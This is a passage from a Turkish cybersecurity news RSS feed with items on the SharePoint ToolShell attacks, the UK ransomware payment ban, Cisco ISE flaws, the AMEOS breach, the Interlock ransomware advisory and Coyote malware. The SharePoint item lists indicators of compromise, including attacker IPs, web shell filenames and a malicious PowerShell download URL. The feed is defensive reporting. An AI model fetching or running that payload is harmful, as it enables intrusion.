            <guid>https://cumha.com.tr/microsoft-sharepoint-saldirilarini-cin-baglantili-hacker-gruplarina-bagladi-toolshell-istismar-zinciriyle-dunya-genelinde-onlarca-kurum-hedef-alindi</guid>
            <description><![CDATA[ Microsoft, SharePoint sunucularını hedef alan sıfır gün açıklarının arkasında Çin merkezli devlet destekli hacker gruplarının olduğunu duyurdu. Linen Typhoon, Violet Typhoon ve Storm-2603 kod adlı aktörlerin dahil olduğu saldırılarda, kritik sistemlere yetkisiz erişim sağlanarak kötü amaçlı kodlar çalıştırıldı. ABD, Avrupa ve Asya&#039;daki kamu kurumları ve şirketler hedefte. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202507/image_870x_6880ae2750a28.webp" length="56820" type="image/webp"/>
            
            <pubDate>Wed, 23 Jul 2025 11:51:53 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>ToolShell saldırı zinciri nedir, SharePoint açıkları kimler tarafından kullanılıyor, hangi kurumlar hedef alındı, Microsoft ve CISA hangi önlemleri öneriyor</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="577" data-end="580">Microsoft, SharePoint yazılımında tespit edilen sıfır gün güvenlik açıklarının Çin bağlantılı siber tehdit grupları tarafından aktif olarak istismar edildiğini açıkladı. <strong data-start="750" data-end="763">ToolShell</strong> olarak adlandırılan bu saldırı zinciri, dünya çapında onlarca kuruluşun sistemlerine sızılmasına neden oldu.</p>
<p></p>
<p data-start="874" data-end="1160">Microsoft’un Salı günü yayımladığı teknik rapora göre, saldırılar <strong data-start="940" data-end="957">Linen Typhoon</strong> ve <strong data-start="961" data-end="979">Violet Typhoon</strong> isimli iki Çin devlet destekli aktör ile ilişkilendirildi. Ayrıca <strong data-start="1046" data-end="1060">Storm-2603</strong> kod adıyla izlenen bir başka Çin merkezli grubun da aynı güvenlik açıklarını kullandığı doğrulandı.</p>
<p data-start="1162" data-end="1614"><strong data-start="1162" data-end="1227">Hedefler: Kamu kurumları, yazılım şirketleri, telekom sektörü</strong><br data-start="1227" data-end="1230">Hollanda merkezli Eye Security şirketi, saldırıların ilk olarak 7 Temmuz'da tespit edildiğini ve <strong data-start="1327" data-end="1347">en az 54 kurumun</strong> etkilendiğini açıkladı. Bu kurumlar arasında çok uluslu şirketler ve bazı hükümet organları yer alıyor. Check Point tarafından yapılan açıklamada ise saldırıların Kuzey Amerika ve Batı Avrupa’da kamu, telekomünikasyon ve yazılım sektörlerini hedef aldığı belirtildi.</p>
<p data-start="1616" data-end="1965"><strong data-start="1616" data-end="1650">Zafiyet zinciri ve CVE kodları</strong><br data-start="1650" data-end="1653">Söz konusu saldırılar, <strong data-start="1676" data-end="1694">CVE-2025-49704</strong> ve <strong data-start="1698" data-end="1716">CVE-2025-49706</strong> kodlu iki SharePoint açığını istismar ederek başladı. Microsoft, 16 Temmuz’daki <strong data-start="1797" data-end="1826">Yama Salı (Patch Tuesday)</strong> güncellemeleriyle bu açıkları kapattı ve sonrasında yeni tanımlanan açıklar için <strong data-start="1908" data-end="1926">CVE-2025-53770</strong> ve <strong data-start="1930" data-end="1948">CVE-2025-53771</strong> kodlarını verdi.</p>
<p data-start="1967" data-end="2215">Bu açıklar, kimlik doğrulama gerektirmeden saldırganların SharePoint içeriklerine tam erişim sağlamasına ve ağ üzerinden kod yürütmesine olanak tanıyor. Microsoft, SharePoint 2016, 2019 ve Abonelik sürümleri için acil yama güncellemeleri yayımladı.</p>
<p data-start="2217" data-end="2667"><strong data-start="2217" data-end="2266">PoC istismarı yayımlandı, saldırı riski arttı</strong><br data-start="2266" data-end="2269">Microsoft’un yamaları yayımlamasının ardından, <strong data-start="2316" data-end="2334">CVE-2025-53770</strong> için bir <strong data-start="2344" data-end="2401">PoC (kavramsal ispat) kodu GitHub üzerinde paylaşıldı</strong>. Bu durum, daha fazla saldırganın açığı kullanma riskini artırıyor. ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı (CISA), bu zafiyeti “Bilinen İstismar Edilen Güvenlik Açıkları” listesine ekledi ve tüm federal kurumlara yamaları ivedilikle uygulama talimatı verdi.</p>
<p data-start="2669" data-end="2925"><strong data-start="2669" data-end="2713">ToolShell saldırı zinciri neler içeriyor</strong><br data-start="2713" data-end="2716">CISA'nın açıklamasına göre ToolShell, yetkisiz sistem erişimi sağlayarak dosya sistemleri ve yapılandırmalar dahil olmak üzere tüm SharePoint içeriklerine ulaşılmasına ve komut çalıştırılmasına olanak tanıyor.</p>
<p data-start="2927" data-end="3094">Microsoft ayrıca güvenlik ekiplerinin ağlarında kompromize olmuş SharePoint sunucularını tespit etmesine yardımcı olmak amacıyla aşağıdaki göstergeleri (IOC) paylaştı:</p>
<ul data-start="3096" data-end="3421">
<li data-start="3096" data-end="3228">
<p data-start="3098" data-end="3228"><strong data-start="3098" data-end="3115">IP adresleri:</strong><br data-start="3115" data-end="3118">134.199.202[.]205<br data-start="3137" data-end="3140">104.238.159[.]149<br data-start="3159" data-end="3162">188.130.206[.]168<br data-start="3181" data-end="3184">131.226.2[.]6 (komuta ve kontrol sunucusu)</p>
</li>
<li data-start="3230" data-end="3334">
<p data-start="3232" data-end="3334"><strong data-start="3232" data-end="3256">Web shell dosyaları:</strong><br data-start="3256" data-end="3259"><code data-start="3261" data-end="3278">Spinstall0.aspx</code>, <code data-start="3280" data-end="3296">spinstall.aspx</code>, <code data-start="3298" data-end="3315">spinstall1.aspx</code>, <code data-start="3317" data-end="3334">spinstall2.aspx</code></p>
</li>
<li data-start="3336" data-end="3421">
<p data-start="3338" data-end="3421"><strong data-start="3338" data-end="3376">Kötü amaçlı PowerShell bağlantısı:</strong><br data-start="3376" data-end="3379"><code data-start="3381" data-end="3421">c34718cbb4c6.ngrok-free[.]app/file.ps1</code></p>
</li>
</ul>
<p data-start="3423" data-end="3648"><strong data-start="3423" data-end="3449">Tavsiye edilen adımlar</strong><br data-start="3449" data-end="3452">CISA ve Microsoft, SharePoint sunucularını yerel (on-premise) olarak kullanan tüm kurumlara acilen yamaları uygulama, ağ trafiğini izleme ve sistem güncellemelerini tamamlama çağrısında bulunuyor.</p>
<p data-start="3650" data-end="3823"><strong data-start="3650" data-end="3662"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Birleşik Krallık kamu kurumlarına fidye ödemesini yasaklıyor: Ransomware tehdidine karşı yeni yasa gündemde</title>
            <link>https://cumha.com.tr/birlesik-krallik-kamu-kurumlarina-fidye-oedemesini-yasakliyor-ransomware-tehdidine-karsi-yeni-yasa-gundemde</link>
            <guid>https://cumha.com.tr/birlesik-krallik-kamu-kurumlarina-fidye-oedemesini-yasakliyor-ransomware-tehdidine-karsi-yeni-yasa-gundemde</guid>
            <description><![CDATA[ Birleşik Krallık hükümeti, yerel yönetimler, okullar ve NHS dahil olmak üzere kamu sektöründeki kuruluşların siber saldırı sonrası fidye ödemesini yasaklamayı planlıyor. Yeni yasa taslağıyla birlikte, fidye yazılımı gruplarının finansal kazanç sağlamasının önüne geçilmesi hedefleniyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202507/image_870x_6880addcc6fb8.webp" length="81328" type="image/webp"/>
            
            <pubDate>Wed, 23 Jul 2025 11:51:52 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Yeni yasa hangi kurumları kapsıyor, fidye ödemeleri neden yasaklanıyor, özel sektör ne şekilde etkilenecek, hangi şirketler son dönemde ransomware saldırısı yaşadı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p>Birleşik Krallık hükümeti, kamu kurumlarının ve kritik altyapı kuruluşlarının fidye yazılımı saldırıları sonrası siber suçlulara ödeme yapmasını yasaklayacak yeni bir yasa üzerinde çalışıyor. Yasa taslağı, <strong data-start="655" data-end="723">yerel yönetimler, devlet okulları ve Ulusal Sağlık Hizmeti (NHS)</strong> gibi kamu kaynaklı kurumları kapsıyor.</p>
<p data-start="764" data-end="1005"><strong data-start="764" data-end="794">Güvenlik Bakanı Dan Jarvis</strong>, yasa ile fidye yazılımı gruplarının iş modelini hedef aldıklarını belirterek, "Değişim Planımızı uygularken, kamu hizmetlerini korumaya ve fidye yazılımlarına karşı birleşik duruş sergilemeye kararlıyız" dedi.</p>
<p data-start="1007" data-end="1324"><strong data-start="1007" data-end="1050">Fidye ödemeleri ciddi riskler doğuruyor</strong><br data-start="1050" data-end="1053">Hükümet açıklamasında, fidye yazılımlarının İngiltere ekonomisine her yıl milyonlarca sterlinlik zarar verdiği belirtildi. Ayrıca bu saldırıların operasyonel aksaklıklardan finansal kayıplara ve hatta hayati risklere kadar birçok ciddi sonuca yol açtığına dikkat çekildi.</p>
<p data-start="1326" data-end="1482">Yeni düzenlemeyle kamu kurumlarının fidye ödeyerek saldırganları finanse etmesi önlenecek ve bu kurumların daha az cazip hedefler haline gelmesi sağlanacak.</p>
<p data-start="1484" data-end="1799"><strong data-start="1484" data-end="1533">Özel sektör için bildirim zorunluluğu geliyor</strong><br data-start="1533" data-end="1536">Yasa kapsamına girmeyen özel sektör kuruluşlarının fidye ödemesi yapmadan önce devlete bildirimde bulunması gerekecek. Bu aşamada, ödemenin yaptırımlara tabi siber suç gruplarına gitme riski değerlendirilecek. Bu grupların çoğu Rusya merkezli olarak tanımlanıyor.</p>
<p data-start="1801" data-end="2002">Ayrıca, fidye yazılımı saldırılarına ilişkin <strong data-start="1846" data-end="1874">zorunlu bildirim sistemi</strong> de kurulacak. Bu sistem sayesinde kolluk kuvvetlerinin saldırganları tespit etmesi ve mağdurlara destek sağlaması hedefleniyor.</p>
<p data-start="2004" data-end="2300"><strong data-start="2004" data-end="2053">Kapsamlı bir kamuoyu danışma süreci yürütüldü</strong><br data-start="2053" data-end="2056">Ocak 2025’te başlatılan kamuoyu danışma süreci kapsamında, kamu sektörü ve ulusal altyapı kuruluşlarının fidye ödemelerinin yasaklanması, fidye ödemelerinin caydırılması ve olay bildirimlerinin zorunlu hale getirilmesi gibi adımlar önerilmişti.</p>
<p data-start="2302" data-end="2683"><strong data-start="2302" data-end="2378">Ransomware, İngiltere’de ulusal güvenlik sorunu olarak değerlendiriliyor</strong><br data-start="2378" data-end="2381">Ulusal Siber Güvenlik Merkezi (NCSC) ve Ulusal Suç Ajansı (NCA), fidye yazılımlarını ülkenin karşı karşıya olduğu en büyük siber suç tehdidi olarak tanımlıyor. Son yıllarda <strong data-start="2554" data-end="2561">NHS</strong>, <strong data-start="2563" data-end="2582">British Library</strong>, <strong data-start="2584" data-end="2603">Marks &amp; Spencer</strong>, <strong data-start="2605" data-end="2614">Co-op</strong> ve <strong data-start="2618" data-end="2629">Harrods</strong> gibi önemli kurumlar bu tür saldırıların hedefi oldu.</p>
<p data-start="2685" data-end="2956">Özellikle Nisan 2025’te Marks &amp; Spencer’ın <strong data-start="2728" data-end="2743">DragonForce</strong> isimli fidye yazılımıyla karşılaştığı saldırı sonrası çevrimiçi siparişler durdurulmuş, 1.400 mağazada operasyonlar aksaklığa uğramıştı. Co-op ise güncel ve eski üyelere ait verilerin sızdırıldığını doğrulamıştı.</p>
<p data-start="2958" data-end="3138"><br><strong data-start="2958" data-end="2970"></strong></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Cisco, ISE yazılımındaki kritik açıkların aktif olarak istismar edildiğini doğruladı: Yama uygulanmayan sistemler risk altında</title>
            <link>https://cumha.com.tr/cisco-ise-yazilimindaki-kritik-aciklarin-aktif-olarak-istismar-edildigini-dogruladi-yama-uygulanmayan-sistemler-risk-altinda</link>
            <guid>https://cumha.com.tr/cisco-ise-yazilimindaki-kritik-aciklarin-aktif-olarak-istismar-edildigini-dogruladi-yama-uygulanmayan-sistemler-risk-altinda</guid>
            <description><![CDATA[ Cisco, kimlik ve erişim yönetimi platformu ISE’de tespit edilen ve 10 üzerinden 10 CVSS puanına sahip üç kritik uzaktan kod çalıştırma (RCE) açığının sahada aktif şekilde istismar edildiğini açıkladı. Şirket, kullanıcıların acilen güvenlik yamalarını uygulaması gerektiğini belirtti. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202507/image_870x_6880ad8a75f02.webp" length="58428" type="image/webp"/>
            
            <pubDate>Wed, 23 Jul 2025 11:51:50 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Cisco ISEdeki açıklar nasıl çalışıyor, hangi sürümler etkileniyor, saldırganlar bu açıkları nasıl istismar ediyor, sistem yöneticileri hangi sürümlere geçmeli</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="462" data-end="465">Cisco, kurumların ağ erişimini ve güvenlik politikalarını yönettiği <strong data-start="533" data-end="567">Identity Services Engine (ISE)</strong> yazılımında tespit edilen üç kritik güvenlik açığının aktif olarak kötü amaçlı saldırganlar tarafından kullanıldığını bildirdi. Açıklar, herhangi bir kimlik doğrulama gerektirmeden sistemde root yetkisiyle kod çalıştırılmasına imkân tanıyor.</p>
<p></p>
<p data-start="811" data-end="1092"><strong data-start="811" data-end="854">Cisco Güvenlik İstihbarat Ekibi (PSIRT)</strong> tarafından yayımlanan güncel uyarıda, "Temmuz 2025 itibarıyla bu açıkların bazılarına yönelik sahada istismar girişimleri gözlemlenmiştir" denildi. Şirket, etkilenen sistem yöneticilerinin acilen ilgili yamaları yüklemesini tavsiye etti.</p>
<p data-start="1094" data-end="1253"><strong data-start="1094" data-end="1131">Açıkların detayları ve etki alanı</strong><br data-start="1131" data-end="1134">Cisco tarafından sırasıyla 25 Haziran ve 16 Temmuz 2025 tarihlerinde duyurulan açıklar, aşağıdaki gibi sınıflandırıldı:</p>
<ul data-start="1255" data-end="1994">
<li data-start="1255" data-end="1546">
<p data-start="1257" data-end="1546"><strong data-start="1257" data-end="1276">CVE-2025-20281:</strong> Cisco ISE ve ISE-PIC yazılımlarında kimlik doğrulama gerektirmeyen uzaktan kod çalıştırma açığı. Özel olarak hazırlanmış API istekleriyle saldırgan, işletim sisteminde root yetkisiyle komut çalıştırabiliyor.<br data-start="1484" data-end="1487"><em data-start="1489" data-end="1511">Düzeltilen sürümler:</em> ISE 3.3 Patch 7 ve ISE 3.4 Patch 2</p>
</li>
<li data-start="1548" data-end="1786">
<p data-start="1550" data-end="1786"><strong data-start="1550" data-end="1569">CVE-2025-20282:</strong> Cisco ISE 3.4 sürümünde dosya doğrulaması yapılmayan bir alan aracılığıyla kötü niyetli dosyaların yüklenip root yetkisiyle çalıştırılmasına olanak tanıyan dosya yükleme açığı.<br data-start="1746" data-end="1749"><em data-start="1751" data-end="1770">Düzeltilen sürüm:</em> ISE 3.4 Patch 2</p>
</li>
<li data-start="1788" data-end="1994">
<p data-start="1790" data-end="1994"><strong data-start="1790" data-end="1809">CVE-2025-20337:</strong> Cisco ISE ve ISE-PIC sistemlerinde yetersiz veri doğrulama nedeniyle API istekleri üzerinden uzaktan kod çalıştırma açığı.<br data-start="1932" data-end="1935"><em data-start="1937" data-end="1959">Düzeltilen sürümler:</em> ISE 3.3 Patch 7 ve ISE 3.4 Patch 2</p>
</li>
</ul>
<p data-start="1996" data-end="2150">Üç açık da maksimum risk seviyesinde değerlendirilirken (CVSS skoru: <strong data-start="2065" data-end="2073">10.0</strong>), kimlik doğrulama gerektirmemeleri nedeniyle özellikle yüksek risk taşıyor.</p>
<p data-start="2152" data-end="2397"><strong data-start="2152" data-end="2191">Yamaların önemi ve önerilen adımlar</strong><br data-start="2191" data-end="2194">Cisco, söz konusu açıklar için geçici çözüm (workaround) bulunmadığını ve yalnızca yamaların uygulanmasının etkili olduğunu vurguladı. Güvenliğe ilişkin önerilen güncelleme adımları şu şekilde sıralandı:</p>
<ul data-start="2399" data-end="2628">
<li data-start="2399" data-end="2462">
<p data-start="2401" data-end="2462"><strong data-start="2401" data-end="2412">ISE 3.3</strong> kullanıcıları: <strong data-start="2428" data-end="2439">Patch 7</strong> sürümüne yükseltmeli</p>
</li>
<li data-start="2463" data-end="2526">
<p data-start="2465" data-end="2526"><strong data-start="2465" data-end="2476">ISE 3.4</strong> kullanıcıları: <strong data-start="2492" data-end="2503">Patch 2</strong> sürümüne yükseltmeli</p>
</li>
<li data-start="2527" data-end="2628">
<p data-start="2529" data-end="2628"><strong data-start="2529" data-end="2564">ISE 3.2 veya daha eski sürümler</strong>: Bu açıklardan etkilenmediği için herhangi bir işlem gerekmiyor</p>
</li>
</ul>
<p data-start="2630" data-end="2735">Şirket, yamaların uygulanmasında gecikilmesinin sistemlere dışarıdan sızma riskini artıracağını belirtti.</p>
<p data-start="2737" data-end="2913"><strong data-start="2737" data-end="2749"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Avrupa merkezli AMEOS sağlık ağı siber saldırıya uğradı: Hasta, çalışan ve ortak verileri tehlikede</title>
            <link>https://cumha.com.tr/avrupa-merkezli-ameos-saglik-agi-siber-saldiriya-ugradi-hasta-calisan-ve-ortak-verileri-tehlikede</link>
            <guid>https://cumha.com.tr/avrupa-merkezli-ameos-saglik-agi-siber-saldiriya-ugradi-hasta-calisan-ve-ortak-verileri-tehlikede</guid>
            <description><![CDATA[ İsviçre, Almanya ve Avusturya’da 100’ün üzerinde sağlık tesisine sahip olan AMEOS Group, dış kaynaklı bir siber saldırı sonucu hassas verilere yetkisiz erişim sağlandığını duyurdu. Kurum, GDPR kapsamında kamuoyunu bilgilendirirken, olası veri sızıntısına karşı dikkatli olunması çağrısında bulundu. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202507/image_870x_6880ad55279d4.webp" length="53442" type="image/webp"/>
            
            <pubDate>Wed, 23 Jul 2025 11:51:47 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>AMEOS veri ihlalinde hangi bilgiler tehlikeye girdi, saldırının kaynağı belli mi, kurum ne tür önlemler aldı, veri sızıntısı olup olmadığı nasıl tespit edilecek</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="450" data-end="453">Avrupa'nın en büyük özel sağlık ağlarından biri olan AMEOS Group, bilgi güvenliğini ihlal eden bir siber saldırıya uğradığını açıkladı. Kurum, 22 Temmuz 2025’te resmi internet sitesinde yaptığı duyuruda, saldırının ardından bazı hasta, çalışan ve iş ortaklarına ait verilerin tehlikeye girmiş olabileceğini belirtti.</p>
<p></p>
<p data-start="771" data-end="978">Veri ihlali, Avrupa Birliği Genel Veri Koruma Tüzüğü (GDPR) kapsamında kamuya duyuruldu. AMEOS, GDPR’nin 34. maddesi uyarınca potansiyel olarak etkilenen bireyleri bilgilendirme yükümlülüğünü yerine getirdi.</p>
<p data-start="980" data-end="1374"><strong data-start="980" data-end="1021">Üç ülkede 100’den fazla sağlık tesisi</strong><br data-start="1021" data-end="1024">Zürih merkezli AMEOS Group, İsviçre, Almanya ve Avusturya’da hastane, klinik, rehabilitasyon merkezi ve bakım evi olmak üzere 100’ün üzerinde tesiste 18.000 kişiyi istihdam ediyor. Kurum, 10.000’i aşkın yatak kapasitesi ve 1,4 milyar doların üzerindeki yıllık geliriyle DACH bölgesindeki en büyük özel sağlık hizmeti sağlayıcılarından biri konumunda.</p>
<p data-start="1376" data-end="1618"><strong data-start="1376" data-end="1420">Yetkisiz erişim ve olası veri suistimali</strong><br data-start="1420" data-end="1423">Açıklamaya göre, tüm güvenlik önlemlerine rağmen sistemlere yetkisiz erişim sağlandı. Etkilenen veriler arasında hasta bilgileri, çalışan ve ortaklara ait kişisel ve iletişim verileri yer alıyor.</p>
<p data-start="1620" data-end="1939">“Size ya da şirketinize ait iletişim bilgileri ile birlikte hastalar, çalışanlar ve iş ortaklarına ait veriler, izinsiz erişim nedeniyle etkilenmiş olabilir. Bu verilerin internette kötü niyetli şekilde kullanılması ya da üçüncü taraflarla paylaşılması ihtimali göz ardı edilemez.” ifadeleriyle kamuoyu bilgilendirildi.</p>
<p data-start="1941" data-end="2200"><strong data-start="1941" data-end="1983">Sistemler kapatıldı, dış destek alındı</strong><br data-start="1983" data-end="1986">Saldırının ardından tüm IT sistemleri devre dışı bırakılırken, iç ve dış ağ bağlantıları kesildi. AMEOS, mevcut önlemleri güçlendirerek siber güvenlik ve adli bilişim alanında uzman dış ekiplerle çalışmaya başladı.</p>
<p data-start="2202" data-end="2447">Olayla ilgili olarak ilgili ülkelerdeki veri koruma otoritelerine bilgi verildi ve polise suç duyurusunda bulunuldu. Kurumdan sağlık hizmeti alan kişilere, olası kimlik avı ve dolandırıcılık girişimlerine karşı dikkatli olmaları uyarısı yapıldı.</p>
<p data-start="2449" data-end="2688"><strong data-start="2449" data-end="2489">Henüz veri sızıntısı tespit edilmedi</strong><br data-start="2489" data-end="2492">AMEOS, şu ana kadar çalınan verilerin internette paylaşıldığına dair herhangi bir kanıt bulunmadığını belirtti. Soruşturmanın sürdüğünü ve gelişmeler oldukça kamuoyuna bilgi verileceğini açıkladı.</p>
<p data-start="2690" data-end="2865">“Şu anda kişisel verilerinizin gerçekten sızdırıldığına dair somut bir bulgu bulunmamaktadır. İnceleme tamamlandığında bu sayfa üzerinden bilgilendirme yapılacaktır.” denildi.</p>
<p data-start="2867" data-end="3083">Saldırının fidye yazılımı kaynaklı olup olmadığı veya herhangi bir veri şifreleme işlemi gerçekleşip gerçekleşmediği henüz bilinmiyor. Şu ana dek herhangi bir fidye yazılımı grubu saldırının sorumluluğunu üstlenmedi.</p>
<p data-start="3085" data-end="3262"><strong data-start="3085" data-end="3097"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>CISA ve FBI'dan Interlock fidye yazılımı için kritik uyarı: Sağlık sektörü başta olmak üzere hedef genişliyor</title>
            <link>https://cumha.com.tr/cisa-ve-fbidan-interlock-fidye-yazilimi-icin-kritik-uyari-saglik-sektoeru-basta-olmak-uzere-hedef-genisliyor</link>
            <guid>https://cumha.com.tr/cisa-ve-fbidan-interlock-fidye-yazilimi-icin-kritik-uyari-saglik-sektoeru-basta-olmak-uzere-hedef-genisliyor</guid>
            <description><![CDATA[ ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı (CISA) ile FBI, Interlock fidye yazılımı grubunun artan saldırılarına karşı uyarıda bulundu. Sağlık kurumlarını, kritik altyapıyı ve şirketleri hedef alan saldırılarda, şifreleme öncesi veri sızdırılarak çifte şantaj yöntemleri uygulanıyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202507/image_870x_6880ad1a08284.webp" length="43790" type="image/webp"/>
            
            <pubDate>Wed, 23 Jul 2025 11:51:44 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Interlock fidye yazılımı hangi kurumları hedef alıyor, çifte şantaj yönteminde ne tür veriler kullanılıyor, FileFix yöntemi nasıl çalışıyor, hangi siber güvenlik önlemleri öneriliyor</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="449" data-end="452">ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı (CISA) ile Federal Soruşturma Bürosu (FBI), Interlock fidye yazılımı grubunun son dönemde artan saldırılarına karşı bir uyarı yayımladı. Uyarı, Sağlık ve İnsan Hizmetleri Bakanlığı (HHS) ve Çok Eyaletli Bilgi Paylaşım ve Analiz Merkezi (MS-ISAC) iş birliğiyle hazırlandı.</p>
<p></p>
<p data-start="772" data-end="959">Haziran 2025’e kadar olan saldırıların incelenmesiyle elde edilen bulgular, uyarı metninde yer alan siber tehdit göstergeleri (IoC) ve savunma önlemleriyle birlikte kamuoyuyla paylaşıldı.</p>
<p data-start="961" data-end="1201"><strong data-start="961" data-end="1007">Hedef: Sağlık sektörü ve kritik altyapılar</strong><br data-start="1007" data-end="1010">Eylül 2024’te ortaya çıkan Interlock fidye yazılımı grubu, kısa sürede küresel çapta birçok sektöre saldırı düzenledi. Sağlık hizmetleri, grubun en sık hedef aldığı alanların başında geliyor.</p>
<p data-start="1203" data-end="1479">Geçtiğimiz haftalarda Interlock grubu, böbrek sağlığı alanında hizmet veren Fortune 500 şirketi DaVita’nın sistemlerinden 1,5 terabayt veri çaldığını ve sızdırdığını duyurdu. Grup ayrıca 120'den fazla sağlık merkezi bulunan Kettering Health sistemlerine de sızdığını açıkladı.</p>
<p data-start="1481" data-end="1813"><strong data-start="1481" data-end="1512">Olağandışı sızma yöntemleri</strong><br data-start="1512" data-end="1515">FBI’ın yaptığı teknik analizlere göre, Interlock aktörleri genellikle zararlı yazılımı, kötü niyetli bağlantılar içeren yasal görünümlü internet siteleri aracılığıyla yayıyor. Bu “drive-by download” yöntemi, fidye yazılımı grupları arasında nadir rastlanan bir erişim tekniği olarak dikkat çekiyor.</p>
<p data-start="1815" data-end="2056">Saldırganlar, hedef sistemlere erişim sağladıktan sonra hem verileri şifreliyor hem de öncesinde dışarı aktarılan dosyalarla çifte şantaj yapıyor. Kurbanlar, hem verilerin geri yüklenmesi hem de ifşa edilmemesi için fidye ödemeye zorlanıyor.</p>
<p data-start="2058" data-end="2447"><strong data-start="2058" data-end="2102">Yeni sosyal mühendislik tekniği: FileFix</strong><br data-start="2102" data-end="2105">Interlock grubu, bu ay itibarıyla yeni bir sosyal mühendislik tekniği olan <strong data-start="2180" data-end="2191">FileFix</strong> yöntemini de kullanmaya başladı. Bu yöntemde, Windows Dosya Gezgini ve HTML uygulamaları (.HTA) gibi güvenilir arayüz öğeleri kullanılarak kurbanların hiçbir güvenlik uyarısı almadan zararlı PowerShell ya da JavaScript kodlarını çalıştırmaları sağlanıyor.</p>
<p data-start="2449" data-end="2613"><strong data-start="2449" data-end="2478">Alınması gereken önlemler</strong><br data-start="2478" data-end="2481">CISA ve FBI, kurumların aşağıdaki adımları uygulayarak Interlock tehdidine karşı savunmalarını güçlendirmesi gerektiğini belirtiyor:</p>
<ul data-start="2615" data-end="3015">
<li data-start="2615" data-end="2687">
<p data-start="2617" data-end="2687">DNS filtreleme ve web erişim güvenlik duvarlarının etkinleştirilmesi</p>
</li>
<li data-start="2688" data-end="2754">
<p data-start="2690" data-end="2754">Sosyal mühendislik saldırılarına karşı çalışanların eğitilmesi</p>
</li>
<li data-start="2755" data-end="2817">
<p data-start="2757" data-end="2817">Sistem, yazılım ve donanım yazılımlarının güncel tutulması</p>
</li>
<li data-start="2818" data-end="2873">
<p data-start="2820" data-end="2873">Ağ segmentasyonu yapılarak erişim sınırlandırılması</p>
</li>
<li data-start="2874" data-end="2933">
<p data-start="2876" data-end="2933">Kimlik ve erişim yönetimi politikalarının oluşturulması</p>
</li>
<li data-start="2934" data-end="3015">
<p data-start="2936" data-end="3015">Çok faktörlü kimlik doğrulamanın (MFA) tüm servislerde zorunlu hale getirilmesi</p>
</li>
</ul>
<p data-start="3017" data-end="3216"><strong data-start="3017" data-end="3029"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Coyote zararlı yazılımı, Windows erişilebilirlik altyapısını kullanarak banka ve kripto hesaplarını hedef alıyor</title>
            <link>https://cumha.com.tr/coyote-zararli-yazilimi-windows-erisilebilirlik-altyapisini-kullanarak-banka-ve-kripto-hesaplarini-hedef-aliyor</link>
            <guid>https://cumha.com.tr/coyote-zararli-yazilimi-windows-erisilebilirlik-altyapisini-kullanarak-banka-ve-kripto-hesaplarini-hedef-aliyor</guid>
            <description><![CDATA[ Yeni bir Coyote bankacılık truva atı varyantı, Windows’un erişilebilirlik özelliği olan UI Automation (UIA) sistemini kötüye kullanarak kullanıcıların hangi banka veya kripto para borsalarına eriştiğini tespit ediyor. Uzmanlara göre bu yöntem, geleneksel güvenlik yazılımlarını atlatma konusunda oldukça etkili. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202507/image_870x_6880ac7dd8c5c.webp" length="70406" type="image/webp"/>
            
            <pubDate>Wed, 23 Jul 2025 11:51:42 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Coyote zararlı yazılımı nasıl çalışıyor, Windows UIA hangi amaçla kötüye kullanılıyor, hangi bankalar ve borsalar hedef alınıyor, Microsoft bu duruma nasıl yanıt verecek</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="476" data-end="479">Coyote isimli zararlı yazılımın yeni bir sürümü, Microsoft’un Windows işletim sisteminde sunduğu UI Automation (UIA) altyapısını kötüye kullanarak banka ve kripto para borsalarına erişen kullanıcıların kimlik bilgilerini hedef alıyor.</p>
<p></p>
<p data-start="715" data-end="1034">Microsoft UIA, erişilebilirlik ihtiyaçları için geliştirilmiş bir API sistemi olarak yazılımların arayüz bileşenlerine dışarıdan erişim sağlamaya yarıyor. Uygulamaların arayüz elemanlarını gezmek, özelliklerini okumak ve bu elemanlarla etkileşime geçmek için kullanılan sistem, siber saldırganların da ilgisini çekiyor.</p>
<p data-start="1036" data-end="1315"><strong data-start="1036" data-end="1079">Gerçek saldırılar Şubat 2025’te başladı</strong><br data-start="1079" data-end="1082">Akamai tarafından yapılan açıklamaya göre, söz konusu tekniğin kötüye kullanılabileceği uyarısı Aralık 2024’te yapılmıştı. Ancak Şubat 2025 itibarıyla bu yöntemin zararlı yazılımlar tarafından sahada kullanıldığı ilk kez gözlemlendi.</p>
